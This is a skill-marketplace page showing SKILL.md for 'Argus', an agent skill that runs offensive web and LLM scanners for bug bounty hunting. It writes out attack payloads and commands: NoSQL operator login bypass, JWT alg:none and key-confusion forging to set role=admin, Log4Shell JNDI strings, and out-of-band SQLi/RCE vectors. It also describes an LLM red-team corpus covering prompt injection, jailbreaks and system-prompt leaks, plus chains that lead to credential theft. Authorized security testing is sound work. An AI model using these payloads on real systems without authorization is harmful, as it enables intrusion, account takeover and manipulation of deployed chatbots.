本文へ移動
cccskills
無料GitHub で公開

argus

Argus — the all-seeing scanner suite. Six automated scanners for high-value web + LLM bug classes — CORS misconfiguration (origin reflection / null / credentialed read), CRLF & host-header injection, NoSQL injection (operator auth-bypass / $where blind), JWT attacks (alg:none / RS256→HS256 confusion / secret crack), out-of-band confirmation of blind SSRF/XXE/SQLi/RCE/Log4Shell via interactsh, and an LLM red-team corpus (prompt-injection / jailbreak / system-prompt leak / exfil / indirect injection). Use when a target exposes a JSON API, a login endpoint, JWT auth, a parameter that might reach the server, a chatbot/agent, or any endpoint suspected of a blind/out-of-band bug.

インストール方法を見る

含まれるファイル(1)

  • SKILL.md6.7 KB

SKILL.md(原文)

インストールする前に、エージェントに与えられる指示の中身を確認できます。

ARGUS — THE ALL-SEEING SCANNER SUITE

Named for Argus Panoptes, the hundred-eyed giant. Six "eyes" that surface what ordinary scans miss: two of the most common web2 classes (CORS, CRLF), the NoSQL "db" surface, JWT forging, blind-bug confirmation via OOB (the eye that sees the invisible — unblocks an entire severity band), and automated LLM red-teaming. All pure-Python, no new deps. Core logic is offline-testable.


0. ROUTING — which tool for what

Signal on the targetTool / command
API reflects Origin, or ACAO/ACAC headers seen/cors
Param reaches a redirect / Location / log / response header/crlf
JSON login or {user,pass} body, Mongo/Mongoose stack/nosqli
Authorization: Bearer ey... / JWT in cookie or storage/jwt-scan
Suspected blind SSRF/XXE/SQLi/RCE (no in-band signal)/oob
Chatbot / agent / LLM feature/llm-redteam

1. CORS — /cors

tools/cors_scanner.py https://api.target.com/me --cookie "session=..."
tools/cors_scanner.py -l recon/target.com/urls/api.txt --json

Sends crafted Origin headers, classifies Access-Control-Allow-Origin / Access-Control-Allow-Credentials:

  • CRITICAL — reflects attacker origin with ACAC: true → cookie-auth'd cross-origin read (account-data exfil).
  • HIGH — null origin trusted with credentials.
  • MEDIUM — reflects without creds (exploitable when auth = non-cookie token), or trusts http downgrade.
  • Probes suffix/prefix regex bypass (target.com.evil, notarget.com) and subdomain trust (chains with takeover).

Always pass --cookie with a live session — the credentialed path is the win.

2. CRLF / host-header — /crlf

tools/crlf_scanner.py "https://target.com/r?u=x" --host-header

Injects encoded CRLF (%0d%0a, double-encoded, UTF-8 overlong %E5%98%8A%E5%98%8D) trying to land Set-Cookie: crlftest=1 in the response. --host-header also tests Host / X-Forwarded-Host / Forwarded injection and flags attacker-host reflection in Location (password-reset poisoning). Impact: session fixation, open redirect, cache poisoning, reset poisoning.

urllib strips raw \r\n from URLs by design — the encoded variants are what actually go on the wire.

3. NoSQL injection — /nosqli

tools/nosqli_scanner.py --login https://t/api/login --user-field email --pass-field password
tools/nosqli_scanner.py --query "https://t/api/items?id=1"   # emits bracket variants
  • Operator auth-bypass: {"email":{"$ne":null},"password":{"$ne":null}}
  • Bracket syntax (Express/qs): email[$ne]=&password[$ne]=
  • $where time-based blind: {"$where":"sleep(5000)"} → server-side JS eval = CRITICAL

Sends a wrong-credential baseline first, flags a finding when status flips 401→200, body length jumps >25%, or the $where payload delays the response ≥3.5 s.

4. JWT attacks — /jwt-scan (offline)

tools/jwt_scanner.py "$TOKEN" --analyze
tools/jwt_scanner.py "$TOKEN" --alg-none --set role=admin
tools/jwt_scanner.py "$TOKEN" --confuse --public-key jwks_pub.pem --set role=admin
tools/jwt_scanner.py "$TOKEN" --crack --wordlist secrets.txt
  • --alg-none — strip signature, set alg to none/None/NONE/nOnE.
  • --confuse — RS256→HS256: re-sign with the server's public key as HMAC secret.
  • --crack — brute the HS256 secret.
  • --analyze — flags alg=none, missing exp, trust-bearing claims (role/is_admin/scope), kid (probe for traversal/SQLi).

Get the public key from /.well-known/jwks.json or /jwks.json. Replay the forged token against an authed endpoint — acceptance = auth bypass / privesc.

5. Out-of-band confirmation — /oob ⭐

The highest-leverage tool. Confirms blind bugs that have no in-band signal by correlating interactsh callbacks to the firing payload.

# 1. listener (prints your OOB domain, streams interactions)
tools/oob_listener.py --listen > inter.jsonl
# 2. payloads embedding a unique marker per injection point
tools/oob_listener.py --payloads cXXXX.oast.fun --json > payloads.json
# 3. correlate received callbacks
tools/oob_listener.py --correlate inter.jsonl --payloads-file payloads.json

Covers blind SSRF, XXE (incl. OOB-DTD exfil), SQLi (MSSQL xp_dirtree / MySQL LOAD_FILE / Oracle UTL_HTTP / Postgres COPY…PROGRAM), RCE (curl/nslookup/backticks), and Log4Shell (${jndi:ldap://…} + ${lower:j} filter bypass). Needs interactsh-client (/arsenal interactsh-client for the install hint); payload generation + correlation work offline without it.

Why it matters: without OOB you cannot prove blind SSRF/XXE/SQLi/RCE — a whole band of Critical findings is otherwise un-submittable.

6. LLM red-team — /llm-redteam

tools/llm_redteam.py --url https://t/api/chat --field message
tools/llm_redteam.py --url https://t/api/chat \
  --template '{"messages":[{"role":"user","content":"{{PAYLOAD}}"}]}' \
  --response-path choices.0.message.content --category jailbreak

Fires a categorized corpus — prompt-injection, jailbreak, system-prompt-leak, data-exfil, indirect-injection, guardrail-bypass — and uses a canary token (RT_PWNED_xxxx) for reliable hit detection. --header "Authorization: Bearer ..." for authed bots.

A bare injection is Informational until chained. Escalate to chatbot IDOR, data exfil (the markdown-beacon hit proves a channel), or RCE if the agent has a code/tool capability. See web2-vuln-classes §11 and bug-bounty Agentic AI (ASI01–ASI10).


CHAINS

  • CORS credentialed read → harvest CSRF token / PII / API key → ATO.
  • Subdomain-trust CORS + subdomain takeover = clean credentialed-read exploit.
  • JWT forge (--alg-none/--confuse + --set role=admin) → privesc → IDOR sweep.
  • Blind SSRF (confirmed via /oob) → cloud metadata → credential theft.
  • LLM indirect injection → chatbot IDOR / exfil channel.

レビュー

まだレビューはありません。使ってみた感想をお寄せください。

同じリポジトリのスキル

概要と使いどころ

Black-box security audit of a DEPLOYED AI agent (not the MCP server behind it) — tool-call hijacking, cross-session memory poisoning, confused-deputy via connected tools, agent-to-agent IDOR, excessive agency / unconfirmed destructive actions, and privilege compromise where the agent holds broader perms than the user. Use when the target is a live assistant/agent product with tool access (bookings, email, payments, file/RAG, browsing) rather than a raw LLM chat box or an MCP server you can read.

日本語の概要は準備中です。原文の説明を表示しています。

awarexone/Agentic-Bug-Hunter5,3232026年10月10日 更新

Use at the START of any bug bounty hunting session, when switching targets, or when feeling lost about what to do next. Master orchestrator that combines the 5-phase non-linear hunting workflow with the critical thinking framework (developer psychology, anomaly detection, What-If experiments). Routes to all other skills based on current hunting phase. Also use when asking "what should I do next" or "where am I in the process."

日本語の概要は準備中です。原文の説明を表示しています。

awarexone/Agentic-Bug-Hunter5,3232026年10月10日 更新

Complete bug bounty workflow — recon (subdomain enumeration, asset discovery, fingerprinting, HackerOne scope, source code audit), pre-hunt learning (disclosed reports, tech stack research, mind maps, threat modeling), vulnerability hunting (IDOR, SSRF, XSS, auth bypass, CSRF, race conditions, SQLi, XXE, file upload, business logic, GraphQL, HTTP smuggling, cache poisoning, OAuth, timing side-channels, OIDC, SSTI, subdomain takeover, cloud misconfig, ATO chains, agentic AI), LLM/AI security testing (chatbot IDOR, prompt injection, indirect injection, ASCII smuggling, exfil channels, RCE via code tools, system prompt extraction, ASI01-ASI10), A-to-B bug chaining (IDOR→auth bypass, SSRF→cloud metadata, XSS→ATO, open redirect→OAuth theft, S3→bundle→secret→OAuth), bypass tables (SSRF IP bypass, open redirect bypass, file upload bypass), language-specific grep (JS prototype pollution, Python pickle, PHP type juggling, Go template.HTML, Ruby YAML.load, Rust unwrap), and reporting (7-Question Gate, 4 validation gates, human-tone writing, templates by vuln class, CVSS 3.1, PoC generation, always-rejected list, conditional chain table, submission checklist). Use for ANY bug bounty task — starting a new target, doing recon, hunting specific vulns, auditing source code, testing AI features, validating findings, or writing reports. 中文触发词:漏洞赏金、安全测试、渗透测试、漏洞挖掘、信息收集、子域名枚举、XSS测试、SQL注入、SSRF、安全审计、漏洞报告

日本語の概要は準備中です。原文の説明を表示しています。

awarexone/Agentic-Bug-Hunter5,3232026年10月10日 更新

Complete bug bounty workflow — recon, pre-hunt learning, vulnerability hunting (IDOR, SSRF, XSS, auth bypass, CSRF, race conditions, SQLi, XXE, file upload, business logic, GraphQL, HTTP smuggling, cache poisoning, OAuth, OIDC, SSTI, subdomain takeover, cloud misconfig, ATO chains, agentic AI), LLM/AI security testing (ASI01-ASI10), A-to-B bug chaining, bypass tables, language-specific grep patterns, and reporting (7-Question Gate, 4 validation gates, CVSS 3.1, PoC generation, submission checklist). Use for ANY bug bounty task — recon, hunting specific vulns, auditing source code, testing AI features, validating findings, or writing reports.

日本語の概要は準備中です。原文の説明を表示しています。

awarexone/Agentic-Bug-Hunter5,3232026年10月10日 更新

CI/CD pipeline security hunting — GitHub Actions workflow injection, secret exfiltration, self-hosted runner poisoning, dependency confusion, OIDC token theft, and supply chain attacks. Covers sisakulint scanning, manual workflow analysis, and chaining CI/CD bugs into critical findings. Use when a target has public repos, GitHub Actions, CircleCI, Jenkins, or GitLab CI.

日本語の概要は準備中です。原文の説明を表示しています。

awarexone/Agentic-Bug-Hunter5,3232026年10月10日 更新

Client-side request-signing and anti-bot token reversal for bug bounty — when a request carries a sign/sig/hmac/token/nonce/timestamp/X-Sensor header that Burp Repeater cannot replay, recover the signer just enough to reproduce the request outside the client. Packet-first staging (capture real request → prove replay works → only reverse if replay fails) across the locate→recover→runtime→validation→replay spine. Covers tracing backward from the signature field (writer→builder→entry→source), isolating user-mutable sign inputs (timestamp/nonce/deviceId/body) vs constants (secret key), hooking fetch/XHR in DevTools, JS deobfuscation basics (webpack/wasm/JSVMP), and the bounty payoff: reach the protected API to then hunt IDOR/auth/business-logic. Use when Burp/mitmproxy replay of a signed or anti-bot-gated request fails and you suspect a client-computed field is blocking you.

日本語の概要は準備中です。原文の説明を表示しています。

awarexone/Agentic-Bug-Hunter5,3232026年10月10日 更新

awarexone のスキルをすべて見る

このスキルの問題を報告する